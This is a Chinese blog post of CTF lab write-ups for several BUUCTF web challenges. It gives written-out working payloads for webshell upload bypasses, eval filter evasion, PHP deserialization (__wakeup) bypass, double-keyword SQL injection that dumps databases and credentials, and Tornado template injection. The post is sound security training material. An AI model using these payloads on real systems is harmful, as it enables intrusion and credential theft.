BUUCTF web(二)

最新推荐文章于 2023-03-30 11:23:55 发布
最新推荐文章于 2023-03-30 11:23:55 发布
阅读量1.4k 收藏
点赞数
分类专栏: 刷题笔记 文章标签: 前端 安全 php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_46616663/article/details/120878329
版权

[极客大挑战 2019]Upload

upload想到了文件上传漏洞,先传个一句话木马试试,php和图片马都不行
在这里插入图片描述
试一下phtml,phtml一般是指嵌入了php代码的html文件,但是同样也会作为php解析

也不行,抓包改一下Content-Type
在这里插入图片描述
不让用<?,那就换一种

在这里插入图片描述
。。。。

再加个文件头

GIF89a

OK了,猜测路径应该在/upload里面

蚁剑连上找到根目录下的flag
在这里插入图片描述

[RoarCTF 2019]Easy Calc

源码发现

<?php
error_reporting(0);
if(!isset($_GET['num'])){
    show_source(__FILE__);
}else{
        $str = $_GET['num'];
        $blacklist = [' ', '\t', '\r', '\n','\'', '"', '`', '\[', '\]','\$','\\','\^'];
        foreach ($blacklist as $blackitem) {
                if (preg_match('/' . $blackitem . '/m', $str)) {
                        die("what are you want to do?");
                }
        }
        eval('echo '.$str.';');
}
?>

是可以绕过的
在这里插入图片描述
在这里插入图片描述
在这里说一下,这个空格让waf找不到变量但是php解析的时候可以找到

扫根目录下的所有文件,使用scandir("/"),但是“/”被过滤了,所以我们用chr(“47”)绕过

payload:?%20num=var_dump(scandir(chr(47)))
在这里插入图片描述
然后读flag

payload:?%20num=file_get_contents(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103))

chr(47).chr(102).chr(49).chr(97).chr(103).chr(103) = 》 /f1agg

[ACTF2020 新生赛]Upload

f12把前端检查删掉然后直接传phtml,然后蚁剑连
在这里插入图片描述

[极客大挑战 2019]PHP

dirsearch扫

./dirsearch.py -u http://887b5639-b212-41c1-92e1-ede64684467d.node4.buuoj.cn:81/ -e php

在这里插入图片描述
打开之后看看index.php
在这里插入图片描述
在class.php中会以get方式接受变量select,并且反序列化这个叫select的字符串

再来看看class.php里

<?php
include 'flag.php';


error_reporting(0);


class Name{
    private $username = 'nonono';
    private $password = 'yesyes';

    public function __construct($username,$password){
        $this->username = $username;
        $this->password = $password;
    }

    function __wakeup(){
        $this->username = 'guest';
    }

    function __destruct(){
        if ($this->password != 100) {
            echo "</br>NO!!!hacker!!!</br>";
            echo "You name is: ";
            echo $this->username;echo "</br>";
            echo "You password is: ";
            echo $this->password;echo "</br>";
            die();
        }
        if ($this->username === 'admin') {
            global $flag;
            echo $flag;
        }else{
            echo "</br>hello my friend~~</br>sorry i can't give you the flag!";
            die();

            
        }
    }
}
?>

只有当username=admin且password=100才会输出flag,但是要想办法绕过wakeup函数,否则会把username赋值成guest

那么首先赋值并序列化看看

$a = new Name('admin', 100);
echo serialize($a)

O:4:“Name”:2:{s:14:“Nameusername”;s:5:“admin”;s:14:“Namepassword”;i:100;}

当属性个数大于实际时wakeup会被绕过,那么改成

O:4:“Name”:3:{s:14:“Nameusername”;s:5:“admin”;s:14:“Namepassword”;i:100;}

但是注意到变量是private类型的,所以要加上 %00(url编码过后的,实际上是0x00,echo输出碰见是空就过去了,我们要手动加上)

O:4:“Name”:3:{s:14:"%00Name%00username";s:5:“admin”;s:14:"%00Name%00password";i:100;}

payload:?select=O:4:“Name”:3:{s:14:"%00Name%00username";s:5:“admin”;s:14:"%00Name%00password";i:100;}

拿来吧你!
在这里插入图片描述

BUUCTF-[极客大挑战 2019]BabySQL

过滤了是吧,看看你都过滤啥了

?username=admin&password=1+%27+union+select+1+%23
在这里插入图片描述
就给我剩个1 #,union和select都被过滤了是吧

双写试试(replace查到过滤的字符串然后替换为空【我猜的】)

1 ’ uniunionon selselectect 1 #
在这里插入图片描述
绕过了,但是列数不对

试到3的时候对了

在这里插入图片描述
开始整活儿,看看数据库版本

1 ’ uniunionon selselectect 1,version(),@@version_compile_os#
在这里插入图片描述继续

1 ’ uniunionon selselectect 1,database(),user()#

在这里插入图片描述
当前库为geek,爆一下所有库

1’ ununionion seselectlect 1,2,group_concat(schema_name)frfromom (infoorrmation_schema.schemata) # 
在这里插入图片描述这么多库,先看看ctf里面

爆表名

1’ ununionion seselectlect 1,group_concat(table_name),table_name frfromom infoorrmation_schema.tables whewherere table_schema=‘geek’#
在这里插入图片描述
爆列名

1’ ununionion seselectlect 1,2, group_concat(column_name) frfromom infoorrmation_schema.columns whwhereere table_name=‘b4bsql’#
在这里插入图片描述
后面跟lovesql很像了
1’ ununionion seselectlect 1,database(),group_concat(id,username,passwoorrd) frofromm b4bsql#
拿来吧你!

在这里插入图片描述

[ACTF2020 新生赛]BackupFile

./dirsearch.py -u http://f17406d8-e02f-4041-b7d0-61291ea70c7f.node4.buuoj.cn:81/ -e php

扫出来index.php.bak,下载到本地看看源码

<?php
include_once "flag.php";

if(isset($_GET['key'])) {
    $key = $_GET['key'];
    if(!is_numeric($key)) {
        exit("Just num!");
    }
    $key = intval($key);
    $str = "123ffwsfwefwf24r2f32ir23jrw923rskfjwtsw54w3";
    if($key == $str) {
        echo $flag;
    }
}
else {
    echo "Try to find out source file!";
}

get一个变量key,如果不是数字或数字字符串就exit,然后返回变量的整数值,如果key==str就输出flag

传123就好(注意是==)
在这里插入图片描述

[护网杯 2018]easy_tornado

在这里插入图片描述
三个链接的内容:

flag in /fllllllllllllag
render
md5(cookie_secret+md5(filename))

render是python中的一个渲染函数,也就是一种模板,通过调用的参数不同,生成不同的网页 render配合Tornado使用。

Tornado是一种 Web 服务器软件的开源版本。Tornado 和现在的主流 Web 服务器框架(包括大多数 Python 的框架)有着明显的区别:它是非阻塞式服务器,而且速度相当快。

在tornado模板中,存在一些可以访问的快速对象,这里用到的是handler.settings,handler 指向RequestHandler,而RequestHandler.settings又指向self.application.settings,所以handler.settings就指向

RequestHandler.application.settings了,这里面就是我们的一些环境变量

payload:error?msg={{handler.settings}}

‘cookie_secret’: ‘2785c1f6-7f9e-43f7-a518-c414b3f67235’

/fllllllllllllag md5加密后 3bf9f6cf685a6dd8defadabfb41a03a1

手动加密或者写脚本加密:

e0006bc385616ba60beedca48edce680

拿来吧你(我flllllllllag带着.txt试了半天对不起我是傻子orz)

模板注入。。嗯。。学到了
在这里插入图片描述# [极客大挑战 2019]BuyFlag

管我要好多钱还有正确的password
在这里插入图片描述
看了看源码
在这里插入图片描述
弱类型比较嘛,post一个password=404a试试

在这里插入图片描述
hackbar没反应。。。抓包吧
在这里插入图片描述
嘶。。。。
在这里插入图片描述
user改成1试一下
在这里插入图片描述果然那个user是判断我是不是那个学校学生的

让我付钱。。。再加一个money=100000000试试

在这里插入图片描述
太长0.0,科学计数法试试
在这里插入图片描述
拿来吧你

看了别的师傅的方法还能利用strcmp函数特性绕过,用money[]=1000000000,不过好像只适用于5.3之前的php

N03RR0R
关注
专栏目录
buuctf文件上传漏洞(Pass1~15)_bucctf文件上传 1,网络安全面试简历
2301_79054215的博客
04-15 303
在指定字符串中从后面开始的第一次出现的位置,如果成功,则返回从该位置到字符串结尾的所有字符,如果失败,则返回 false。file_ext,所以相当于只去除前后空格和最后的一个点,还有一个点没被去除,就能利用Windows特性(自动去除文件后的带点)2.上传 .htaccess文件,在将要上传的php文件(或其他文件)后缀修改为txt(或其他在黑名单之外的),然后上传。(mime与文件后缀名作用类似,来告诉服务器文件的性质和格式,但比后缀名更详细,浏览器一般用mine而不用后缀名)
BUUCTF——Web
2201_75331136的博客
07-11 1030
启动靶机,出现这个用户登录页面 随便输入一个用户名和密码,通过网址可以判断出该请求方式使用万能密码测试是否存在SQL注入漏洞登录后便可查看到flagflag为:启动靶机,出现以下页面 查看源代码尝试在网址后面加上?cat=dog出现以下存在flag的页面flag为:启动靶机,出现以下页面查看源代码source.php 应该是后端的源码,这题代码审计了 源码中 给出了 两个文件,还有一个 hint.php,这里给出了flag的位置 得到flagflag为:启动靶机,出现以下界面点击tips跳转到flag.ph
BUUCTF web2
qq_61768489的博客
04-29 816
[GXYCTF2019]BabyUpload Content-Type 要修改才能传入图片 先上传一个.htaccess 内容如下 再去上传一个 图片马 上传成功连蚁剑 [BUUCTF 2018]Online Tool 大佬总结 BUUCTF 2018 Online Tool_恋物语战场原的博客-CSDN博客_buuctf online [BJDCTF2020]The mystery of ip Smarty的SST ,与flask有很大区别 ,大...
BUUCTF Web2
ookami6497的博客
12-12 636
BUUCTF-web类-第题 [强网杯 2019]随便注
weixin_44622228的博客
04-16 664
BUUCTF-web类-第题 [强网杯 2019]随便注 正常输入1,返回一个数组 基本操作,单引号测试下,报错了。 看看 1’ or 1=1 #,发现爆出了所有字段。 常规流程,order by,发现到order by 3#时,报错了,说明该表中只有三个字段。 继续常规流程,联合查询,发现提示竟然过滤了这么多注入时常用的关键字,看来事情没有这么简单。 于是我选择了从头再来,看看有没有别的注...
BUUCTF-Web题解(
flying_bird2019的博客
03-30 318
Hack World 本题可以使用异或注入 0^(if(ascii(substr((select(flag)from(flag)),?,1))>?,1,0)) 这道题主要学到了过滤空格如何注入 空格过滤可以用(字段)、反引号+字段+反引号 本题反引号也被过滤因此只能用括号 ...
buuctf web题代码审计
qq_44740774的博客
09-25 822
buuctf web题代码审计
BUUCTF web [MRCTF2020]套娃 1 wp
Whaocai的博客
08-06 503
考点: ①$SERVER数组的各个元素的含义 ②%0a绕过preg_match() ③data://text/plain;base64的利用 进去之后还是先看看有没有robots.txt文件(自己做题的习惯),发现页面并不跳转,猜测应该是index.php中有header在限制 于是查看源码,看到一段php代码 //1st $query = $_SERVER['QUERY_STRING']; if( substr_count($query, '_') !== 0 || substr_count($qu
BUUCTF部分web题目
最新发布
05-06
### BUUCTF部分Web题目分析 #### WMCTF2020 Make PHP Great Again **题目背景**: 这道题目主要是考察PHP中的`require_once()`函数的使用以及如何利用符号链接来读取文件。 **核心知识点**: 1. **`require_once()...
1ncrd#Study-Record#BUUCTF[第二章 web进阶]XSS闯关1.md
08-10
一些关于xss的payload
BUUCTF-练习场-WEB-第部分(8道)
weixin_45908624的博客
03-30 364
BUUCTF-Web-8道
刷题记录之 webbuuctf 2
dwrnxjlove的博客
07-12 643
刷题记录之 webbuuctf 2 目录刷题记录之 webbuuctf 2IncludeSecret File Include 看到题目之后看到是Include想到可能是文件包含或者是伪协议利用的题目,打开题目之后是个很简洁的页面,只有一个链接 打开这个链接之后是一句话:Can you find out the flag? 问你是否能够找到flag,没有其他有用的信息,然后我就查看网页源代码: 发现这里面有个一变量file和flag.php但是访问flag.php返回的就是Can you find ou
BUUCTF-web刷题记录-2
qq_45628145的博客
07-27 449
[极客大挑战 2019]HardSQL 一个登陆框,简单测试一下很多包括union等字符被过滤了,这里这样构造可以成功登录,但是没有flag,所以是要把flag从数据库读出来了 admin'Or(1)# 1 发现^没有被过滤,可以用来代替and,与extractvalue函数结合来尝试进行报错注入 这个函数在这里的大致用法是这样的,extractvalue(null,concat(0x7e,user(),0x7e)),中间的user()即为你想执行的查询语句 接下来这题就是爆库,爆表,爆字段,爆内容的基本
BUUCTFWEB21820总结
qq_51283187的博客
08-20 211
BUUCTFWEB21820总结 今天做了BUUCTF上的N1BOOK的六个入门题目和web部分的一些基础题。啊,简单题有手就行,难题又不会。瓶颈期了属实是。 N1BOOK ①常见的信息收集 御剑扫目录扫到三个可访问的文件 robots.txt index.php~ .index.php.swp 访问查看就行 ②粗心的小李 git泄露 下载githack然后 githack url 打开下载过来的东西html,里面就有 ③sql注入1 sqlmap就行 或者纯手动注入也快 ③sql注入2 s
BUUCTF n1book [第二章 web进阶]文件上传
nareku的博客
07-02 2496
花了一天多才搭好docker的环境,然后再来写这道只能说自己的环境也太香啦 不过这道题也花了一点点点时间琢磨打开题目,发现是一如既往的文件上传界面 习惯性抓个包,界面源码已经完全暴露了,太长了这里就不放了(根据以往的经验和参考其他的师傅的wp 小小地分析了一下) 这样我们上传的文件的路径就是 upload/随机值/上传的文件名首先我们先创建一个文件(不是文件夹!!),文件后缀随便,只要文件名长度满足18即可,这就成功将后缀完全覆盖了 将文件压缩成zip 在010Edtior中打开该压缩包 修改文件名
BUUCTF_N1BOOK_[第二章 web进阶]文件上传_详解
weixin_43852034的博客
03-04 1168
最后的小插曲:本来以为上传成功之后,用蚁剑砍进去就完事儿了,结果发现居然会报错:嗯???于是直接访问一下上传后的文件:没想到直接得到了flag…后续又把2.php.xxx文件的内容修改为?尝试了一下,发现访问后也是同样的效果。那大概是环境本身做了限制吧…思路应该是没错的,蚁剑虽然说没砍进去…但你就说flag拿没拿到吧!
Buuctf N1BOOK [第二章 web进阶]文件上传
m_de_g的博客
08-17 2882
Buuctf [第二章 web进阶]文件上传 打开题目,发现源代码泄露,初步判断为条件竞争 <?php header("Content-Type:text/html; charset=utf-8"); // 每5分钟会清除一次目录下上传的文件 require_once('pclzip.lib.php'); if(!$_FILES){ echo ' <!DOCTYPE html> <html lang="zh"> <head> <
[第二章 web进阶]文件上传]
DdddddXxxxx的博客
08-08 943
先看一下题目源码: <?php header("Content-Type:text/html; charset=utf-8"); // 每5分钟会清除一次目录下上传的文件 require_once('pclzip.lib.php'); if(!$_FILES){ echo ' <!DOCTYPE html> <html lang="zh"> <head> <meta charset="UTF-8" /> <
BUUCTF-Web:[极客大挑战 2019]Upload
m0_56161093的博客
05-29 898
题目 解题过程 1、上传文件 从网页上来看是上传一个图片文件,但我们不知道他的检查上传的文件,所以可以试一试上传各种文件。一般检查文件的地方有:后缀名、content-type、文件头的部分内容。 这里我们先上传一个php文件,不做任何修改。如下图: 结果如下: 2、修改文件后缀名和content-type 将文件名修改为test.phtml,绕过常规php文件后缀检测 将文件类型修改为:image/jpeg 注意:phtml一般是指嵌入了php代码的html文件,但是同样也会作为php解析 修
buuctf web
08-15
回答:根据引用和引用的内容,buuctf web应该是指buuctf比赛中的一个web题目。其中可能涉及到Tornado作为非阻塞式服务器的使用,以及render函数的使用。而根据引用的内容,buuctf web题目可能存在一些漏洞,比如SSRF...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值